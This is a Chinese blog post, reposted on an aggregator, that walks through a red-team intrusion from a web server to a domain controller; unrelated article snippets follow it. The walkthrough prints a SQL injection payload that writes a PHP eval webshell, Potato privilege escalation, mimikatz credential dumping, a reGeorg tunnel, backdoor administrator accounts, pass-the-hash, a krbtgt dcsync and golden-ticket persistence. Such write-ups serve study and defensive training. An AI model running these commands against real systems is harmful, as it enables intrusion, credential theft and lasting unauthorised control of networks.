红队攻防实战之从边界突破到漫游内网(无cs和msf)

也许有一天我们再相逢,睁大眼睛看清楚,我才是英雄。

本文首发于先知社区,原创作者即是本人

本篇文章目录

在这里插入图片描述

网络拓扑图:

本次红队攻防实战所需绘制的拓扑图如下:

在这里插入图片描述

边界突破

访问网站:

http://xxx.xxx.xxx/?id=1

首页如下:

在这里插入图片描述

SQL注入拿shell

构造payload:and 1=1显示正确,and 1=2显示错误,说明存在SQL注入,并且爆出绝对路径

在这里插入图片描述

使用常用的注入函数into outfile 将一句话木马写入自动创建的 xxx.php文件中

http://xxx.xxx.xxx/?id=1 and 1=2 union select 1,'<?php @eval($_REQUEST[xxx]);?>' into outfile 'x:\\xxx\\xxx\\xxx.php'

需要有写入权限和上一步爆出的绝对路径

在这里插入图片描述

验证上传的木马是否成功,成功写入木马

http://xxx.xxx.xxx/xxx.php?xxx=phpinfo();

在这里插入图片描述

成功利用蚁剑拿到shell

在这里插入图片描述

内网信息收集

whoami
发现是普通用户的权限

在这里插入图片描述

ipconfig /all
查看用户的IP信息,可以看到位于工作组环境

在这里插入图片描述

route print
查看路由,通往10.0.1网段

在这里插入图片描述

net config Workstation
查看计算机名、全名、用户名、系统版本、工作站

在这里插入图片描述

利用蚁剑传入Potato提权工具,并使用其虚拟终端,查看权限,提权。
将超时时间调大:

在这里插入图片描述

上传Potato提权工具成功,改名为xxx.exe

在这里插入图片描述

使用命令可以看到成功提权
xxx.exe -p “whoami”

在这里插入图片描述

将mimikatz改名为x.exe,成功上传

在这里插入图片描述

然后在终端执行

xxx.exe -p "x.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit >> log.txt"

在这里插入图片描述

查看log.txt,成功抓到当前用户和另一用户的密码

在这里插入图片描述

在这里插入图片描述

netstat -ano查看是否开启3389端口,发现已开启

在这里插入图片描述

查看防火墙是开启的
netsh firewall show state

在这里插入图片描述

reGeorg内网穿透

使用软件reGeorg实现攻击机与目标机器的通信
通过蚁剑将reGeorge中的tunnel.php上传至网站改名为tu.php

在这里插入图片描述

并成功访问

http://xx.xx.xx/tu.php

在这里插入图片描述

启动reGeorg

python3 xx.py -k xxx -u http://xx.xx.xx/tu.php

表示本地1080端口的流量都转发给指定的那个url,1080是指定的监听端口;

在这里插入图片描述

代理可以使用:

在这里插入图片描述

内网渗透

拿下边界服务器

挂上代理远程连接10.0.1.4

在这里插入图片描述

创建新账号admin 并提权

xx.exe -p "net user xxx xxxx /add" //新增账号和对应密码
xx.exe -p "net localgroup administrators xxxx /add"//提升新增账号的权限至administrators组

在这里插入图片描述

远程连接

在这里插入图片描述

成功连接

在这里插入图片描述

将mimikatz添加到桌面并以管理员权限运行
privilege::debug 提升权限
log 日志会记录内容
sekurlsa::logonpasswords 抓取密码

在这里插入图片描述

成功抓到管理员账户密码:
使用上述管理员账号密码,成功登陆服务器

在这里插入图片描述

通过nbtscan对当前C端进行扫描,发现还有三台机器存活

在这里插入图片描述

拿下域内主机

根据我这个攻防时长两年半的个人练习生的经验来判断,内网里的服务器的账号密码有部分可能是相同的。
再使用上述管理员账号密码远程连接10.0.1.8

在这里插入图片描述

成功连接

在这里插入图片描述

whoami查看是administrator权限
ipconfig /all查看有域xx.xx

在这里插入图片描述

一般DNS服务器就是域控服务器

在这里插入图片描述

查询域控主机名,遭拒绝,需利用官方工具将账号提升至system权限再查
net user /domain

在这里插入图片描述

上传官方工具PsExec.exe提权
PsExec.exe -i -s -d cmd 提升至system权限,获取主机名DC.xx.xx

在这里插入图片描述

尝试访问域控主机C盘
dir \DC.xx.xx\c$

在这里插入图片描述

是拒绝的,需要工具minikatz,使用哈希传递

拿下域控

将mimikatz添加到桌面并以管理员权限运行
privilege::debug 提升权限
log 日志会记录内容
sekurlsa::logonpasswords 抓取密码

在这里插入图片描述

获取

user=administrator
Domain=xxx
NTLM=xxxxxxx

将上述值放入下方命令中,完成哈希传递,以后利用这个CMD窗口运行,拥有管理员权限。

sekurlsa::pth /user:administrator /domain:"xx.xx"
/ntlm:xxxxxxx

启动域控主机cmd窗口,成功访问域控主机C盘
dir \DC.xx.xx\c$

在这里插入图片描述

使用官方工具PsExec.exe,命令如下:
PsExec.exe \dc.xx.xx cmd
进入c:
输入ipconfig, 10.0.1.6为域控ip,此时成功获取域控cmd

在这里插入图片描述

新建账号,直接远程登陆域控主机

"net user xxx xxxx /add" //新增账号和对应密码
"net localgroup administrators xxxx /add"//提升新增账号的权限至administrators组

在这里插入图片描述

建好账号后,直接登陆域控主机10.0.1.6(DC.xx.xx),成功拿下域控主机权限

在这里插入图片描述

至此已成功拿下三台主机的权限。

在这里插入图片描述

权限维持

可通过制作黄金票据进行权限维持
因为域控主机10.0.1.6安装了补丁KB2871997,所以无法抓取到明文密码
管理员运行猕猴桃
log 日志记录内容
lsadump::dcsync /user:krbtgt 获取内容

在这里插入图片描述

获取krbtgt账号的关键值(OSID和Hash_NTLM)

在这里插入图片描述

制作黄金票据

kerberos::golden /admin:administrator /domain:xx.xx /sid:xx-xx-xx /krbtgt:xxxxxx /ticket:xxx.kiribi

如图

在这里插入图片描述

票据加载成功

在这里插入图片描述

普通窗口无法访问域控根目录

在这里插入图片描述

把域控中的票据复制到在10.0.1.8主机中,使用猕猴桃加载票据
kerberos::ptt xxx.kiribi 加载票据

在这里插入图片描述

然后成功在普通cmd中访问域控c盘内容
dir \DC.xx.xx\c$

在这里插入图片描述

PExec.exe \DC.xx.xx cmd 获取域控cmd

在这里插入图片描述

网络安全感悟

做网络安全是一个长期的过程,因为做网络安全没有终点,不管是网络安全企业,还是在网络安全行业各种不同方向的从业人员,不管你选择哪个方向,只有在这条路上坚持不懈,才能在这条路上走的更远,走的更好,不然你肯定走不远,迟早会转行或者被淘汰,把时间全浪费掉。如果你觉得自己是真的热爱网络安全这个行业,坚持走下去就可以了,不用去管别人,现在就是一个大浪淘金的时代,淘下去的是沙子,留下来的才是金子,正所谓,千淘万漉虽辛苦,吹尽狂沙始到金,网络安全的路还很长,一生只做一件事,坚持做好一件事!

文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。

免责声明:由于传播或利用此文所提供的信息、技术或方法而造成的任何直接或间接的后果及损失,均由使用者本人负责, 文章作者不为此承担任何责任。

转载声明:各家兴 拥有对此文章的修改和解释权,如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经作者允许,不得任意修改或者增减此文章的内容,不得以任何方式将其用于商业目的。

CSDN:
https://blog.csdn.net/weixin_48899364?type=blog公众号:
https://mp.weixin.qq.com/mp/appmsgalbum?__biz=Mzg5NTU2NjA1Mw==&action=getalbum&album_id=1696286248027357190&scene=173&from_msgid=2247485408&from_itemidx=1&count=3&nolastread=1#wechat_redirect博客:
https://rdyx0.github.io/先知社区:
https://xz.aliyun.com/u/37846SecIN:
https://www.sec-in.com/author/3097FreeBuf:
https://www.freebuf.com/author/%E5%9B%BD%E6%9C%8D%E6%9C%80%E5%BC%BA%E6%B8%97%E9%80%8F%E6%8E%8C%E6%8E%A7%E8%80%85

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/167443.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Linux 排查必看文件

目录 1. 登录日志 1.1 /var/log/wtmp 1.2 /var/log/btmp.* 1.3 /var/log/lastlog 1.4 /var/log/faillog 1.5 /var/log/secure 1.6 /var/log/auth.log 2. 系统日志 2.1 /var/log/cron.* 2.2 /var/log/syslog 2.3 /var/log/audit/audit.*log 3. 历史命令 3.1 ~/…

Docker 中OpenResty下载与使用

1Panel安装OpenResty 查看到就说明安装成功 部署项目 在http中添加&#xff1a; server { listen 8001; //端口号 server_name localhost; location / { root /admin; //项目路径 index index.html index.htm; …

Java二级医院区域HIS信息管理系统源码(SaaS服务)

一个好的HIS系统&#xff0c;要具有开放性&#xff0c;便于扩展升级&#xff0c;增加新的功能模块&#xff0c;支撑好医院的业务的拓展&#xff0c;而且可以反过来给医院赋能&#xff0c;最终向更多的患者提供更好的服务。 系统采用前后端分离架构&#xff0c;前端由Angular、J…

P1028 [NOIP2001 普及组] 数的计算

时刻记住一句话&#xff1a;写递归&#xff0c;1画图&#xff0c;2大脑放空&#xff01;&#xff01;&#xff01; 意思是&#xff0c;自己写递归题目&#xff0c;先用样例给的数据画图&#xff0c;然后想一个超级简单的思路&#xff0c;直接套上去就可以了。 上题干&#xff…

牛客 HJ106 字符逆序 golang实现

牛客题目算法连接 题目 golang 实现 package mainimport ("fmt""bufio""os" )func main() {str, _ : bufio.NewReader(os.Stdin).ReadString(\n)if len(str) 0 {return } else {newstr:""strLen:len(str)-1for i:strLen;i>0;i-…

生产环境出现问题,测试人如何做工作复盘?

很多时候我们能把大部分的Bug或一些部署等问题在业务上线之前就解决了&#xff0c;但由于某些因素&#xff0c;线上问题还是时而出现&#xff0c;影响业务生产甚至是公司效益。 避免线上问题的发生以及线上问题及时处理是测试人员的一项重要职责&#xff0c;如何快速地处理&am…

XG916Ⅱ轮式装载机后驱动桥设计机械设计CAD

wx供重浩&#xff1a;创享日记 对话框发送&#xff1a;装载机 获取完整论文报告工程源文件 本次设计内容为XG916Ⅱ装载机后驱动桥设计&#xff0c;大致上分为主传动的设计&#xff0c;差速器的设计&#xff0c;半轴的设计&#xff0c;最终传动的设计四大部分。其中主传动锥齿轮…

【多线程】Thread类的使用

目录 1.概述 2.Thread的常见构造方法 3.Thread的几个常见属性 4.启动一个线程-start() 5.中断一个线程 5.1通过共享的标记来进行沟通 5.2 调用 interrupt() 方法来通知 6.等待一个进程 7.获取当前线程引用 8.线程的状态 8.1所有状态 8.2线程状态和转移的意义 1.概述 …

Relabel与Metic Relabel

Prometheus支持多种方式的自动发现目标&#xff08;targets&#xff09;&#xff0c;以下是一些常见的自动发现方式&#xff1a; 静态配置&#xff1a;您可以在Prometheus配置文件中直接列出要监测的目标。这种方式适用于目标相对稳定的情况下&#xff0c;例如固定的服务器或设…

HCIA-RS基础:动态路由协议基础

摘要&#xff1a;本文介绍动态路由协议的基本概念&#xff0c;为后续动态路由协议原理课程提供基础和引入。主要讲解常见的动态路由协议、动态路由协议的分类&#xff0c;以及路由协议的功能和自治系统的概念。文章旨在优化标题吸引力&#xff0c;并通过详细的内容夯实读者对动…

自求导的方法实现线性回归算法

线性回归是一种常用的回归算法&#xff0c;用于建立输入变量和连续输出变量之间的关系。传统的线性回归算法通常依赖于繁琐的数学推导和梯度计算。但是&#xff0c;随着深度学习的兴起&#xff0c;自求导的方法逐渐成为实现线性回归算法的有效途径。本文将介绍如何使用自求导的…

VMware安装windows操作系统

一、下载镜像包 地址&#xff1a;镜像包地址。 找到需要的版本下载镜像包。 二、安装 打开VMware新建虚拟机&#xff0c;选择用镜像文件。将下载的镜像包加载进去即可。

python opencv 边缘检测(sobel、沙尔算子、拉普拉斯算子、Canny)

python opencv 边缘检测&#xff08;sobel、沙尔算子、拉普拉斯算子、Canny&#xff09; 这次实验&#xff0c;我们分别使用opencv 的 sobel算子、沙尔算子、拉普拉斯算子三种算子取进行边缘检测&#xff0c;然后后面又使用了Canny算法进行边缘检测。 直接看代码&#xff0c;代…

论文导读 | 10月专题内容精选:人的预测

编者按 本次论文导读&#xff0c;编者选择了10月份OR和MS上与"人的预测"有关的三篇文章&#xff0c;分别涉及群体智慧的提取&#xff0c;个体序列预测的评估&#xff0c;以及决策者对风险的扭曲感知在分布式鲁棒优化中的应用。其中&#xff0c;从基于"生成式可能…

使用VUE3实现简单颜色盘,吸管组件,useEyeDropper和<input type=“color“ />的使用

1.使用vueuse中的useEyeDropper来实现滴管的功能和使用input中的type"color"属性来实现颜色盘 效果&#xff1a; 图标触发吸管 input触发颜色盘 组件代码部分 &#xff1a;<dropper> ---- vueuse使用 <template><div class"sRGBHexWrap fbc…

补充:如何提高selenium的运行速度?

已经通读该专栏文章的同学,或许对UI自动化测试有了一定的掌握,细心的同学肯定会发现一个问题,当用例量达到一定程度时,对于整体用例的执行速度肯定不会很满意。除了应用多线程运行用例的方式加快速度,有没有其他的方法呢? 今天告诉大家,方法是有的!也是本人新学的。即…

[PyTorch][chapter 66][强化学习-值函数近似]

前言 现实强化学习任务面临的状态空间往往是连续的,无穷多个。 这里主要针对这种连续的状态空间处理。后面DQN 也是这种处理思路。 目录&#xff1a; 1&#xff1a; 原理 2&#xff1a; 梯度更新 3&#xff1a; target 和 预测值 4 流程 一 原理 强化学习最重要的是得到 …

c++版本opencv计算灰度图像的轮廓点

代码 #include<iostream> #include<opencv.hpp>int main() {std::string imgPath("D:\\prostate_run\\result_US_20230804_141531\\mask\\us\\104.bmp");cv::Mat imgGray cv::imread(imgPath, 0);cv::Mat kernel cv::getStructuringElement(cv::MORPH…

任意分圆环下的 RLWE:如何产生正确的噪声分布

参考文献&#xff1a; [Con09] Conrad K. The different ideal[J]. Expository papers/Lecture notes. Available at: http://www.math.uconn.edu/∼kconrad/blurbs/gradnumthy/different.pdf, 2009.[LPR10] Lyubashevsky V, Peikert C, Regev O. On ideal lattices and learn…

thinkphp6生成PDF自动换行

composer安装 composer require tecnickcom/tcpdf 示例 use TCPDF;public function info($university,$performance,$grade,$major){//获取到当前域名$domain request()->domain();//实例化$pdf new TCPDF(P, mm, A4, true, UTF-8, false);// 设置文档信息$pdf->SetCr…